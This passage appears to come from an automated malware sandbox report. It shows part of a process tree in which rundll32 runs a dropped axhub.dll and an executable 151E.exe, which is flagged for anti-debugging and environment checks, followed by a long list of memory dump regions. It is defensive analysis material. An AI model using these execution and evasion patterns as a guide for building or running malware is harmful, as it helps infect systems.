                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\151E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\151E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7764

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/860-186-0x0000000000400000-0x00000000008F2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/860-191-0x0000000000A10000-0x0000000000B5A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1016-431-0x000001AE9FC20000-0x000001AE9FC91000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1016-220-0x000001AE9FB00000-0x000001AE9FB71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1028-227-0x0000024F9F310000-0x0000024F9F381000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1144-449-0x00000155B3070000-0x00000155B30E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1144-234-0x00000155B2E20000-0x00000155B2E91000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1196-262-0x0000018854A40000-0x0000018854AB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1360-187-0x0000000000400000-0x0000000000896000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1360-195-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1380-270-0x000002DE02D70000-0x000002DE02DE1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1460-446-0x000001B93F2F0000-0x000001B93F361000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1460-252-0x000001B93F270000-0x000001B93F2E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1592-382-0x0000000000400000-0x00000000004A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      644KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1936-260-0x0000025C9CE40000-0x0000025C9CEB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1936-452-0x0000025C9CF80000-0x0000025C9CFF1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2196-340-0x0000000000400000-0x000000000064F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2200-455-0x0000000000400000-0x00000000008EC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2224-385-0x00000000054F0000-0x0000000005AF6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2312-438-0x0000000000400000-0x00000000008A2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2312-451-0x00000000008B0000-0x00000000009FA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2472-232-0x00000239DFCB0000-0x00000239DFD21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2472-429-0x00000239DFDA0000-0x00000239DFE11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2528-420-0x0000022FCA160000-0x0000022FCA1D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2528-223-0x0000022FCA010000-0x0000022FCA081000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2780-271-0x0000020995840000-0x00000209958B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2800-272-0x000002530BA60000-0x000002530BAD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2808-439-0x0000000000400000-0x000000000044E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2868-417-0x00000200027B0000-0x0000020002821000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2868-197-0x0000020002220000-0x0000020002291000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3060-273-0x0000000002400000-0x0000000002415000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      84KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3092-400-0x0000022DF6700000-0x0000022DF6771000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3092-399-0x0000022DF6430000-0x0000022DF647C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3092-184-0x0000022DF63E0000-0x0000022DF642C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3092-198-0x0000022DF64A0000-0x0000022DF6511000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3532-162-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3532-169-0x000000001AE10000-0x000000001AE12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-153-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-151-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-156-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-133-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      152KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-160-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-134-0x0000000000400000-0x000000000051D000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3768-131-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3776-441-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4232-255-0x000001CA62DC0000-0x000001CA62DC1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4240-355-0x00000000776C0000-0x000000007784E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4240-387-0x0000000005500000-0x0000000005501000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4260-188-0x0000000004210000-0x000000000426D000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      372KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4260-182-0x00000000042A9000-0x00000000043AA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4296-179-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4300-308-0x00000000055E0000-0x00000000055E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4300-356-0x0000000005770000-0x000000000577F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      60KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4300-297-0x0000000000C40000-0x0000000000C41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-335-0x0000000004C40000-0x0000000004C5C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-307-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-313-0x0000000004A80000-0x0000000004A81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4428-199-0x0000021B16600000-0x0000021B16671000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-311-0x0000000005340000-0x0000000005946000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-300-0x0000000005380000-0x0000000005381000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-303-0x00000000053E0000-0x00000000053E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-333-0x0000000005F60000-0x0000000005F61000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-298-0x0000000005950000-0x0000000005951000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-282-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-312-0x0000000005420000-0x0000000005421000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4516-395-0x00000000044E9000-0x00000000045EA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4516-401-0x00000000043C0000-0x000000000441D000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      372KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4548-453-0x0000000000400000-0x00000000008A8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4668-226-0x0000000000F40000-0x0000000000F41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4668-257-0x00000000058D0000-0x00000000058D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4668-245-0x00000000031C0000-0x00000000031C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4668-235-0x0000000005780000-0x0000000005781000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4716-444-0x0000000000AF0000-0x0000000000B37000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      284KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4744-315-0x0000000004F20000-0x0000000004F21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4744-301-0x0000000000500000-0x0000000000501000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4744-216-0x0000000000950000-0x0000000000A34000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      912KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4796-360-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4796-344-0x00000000000F0000-0x00000000000F1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4804-422-0x0000000002F60000-0x0000000002F72000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4828-346-0x0000000000B90000-0x0000000000BBE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      184KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4828-349-0x0000000000400000-0x00000000009BE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4896-434-0x000001DF1F1C0000-0x000001DF1F291000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      836KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4896-433-0x000001DF1D540000-0x000001DF1D5AF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      444KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4936-358-0x0000000005510000-0x0000000005B16000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4936-331-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4968-426-0x00000000056B0000-0x0000000005CB6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5076-374-0x00000000055C0000-0x00000000055C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5076-351-0x0000000000B10000-0x0000000000B11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5092-321-0x00000000058C0000-0x00000000058C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5092-306-0x0000000000F60000-0x0000000000F61000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5096-243-0x0000000000400000-0x00000000004E4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      912KB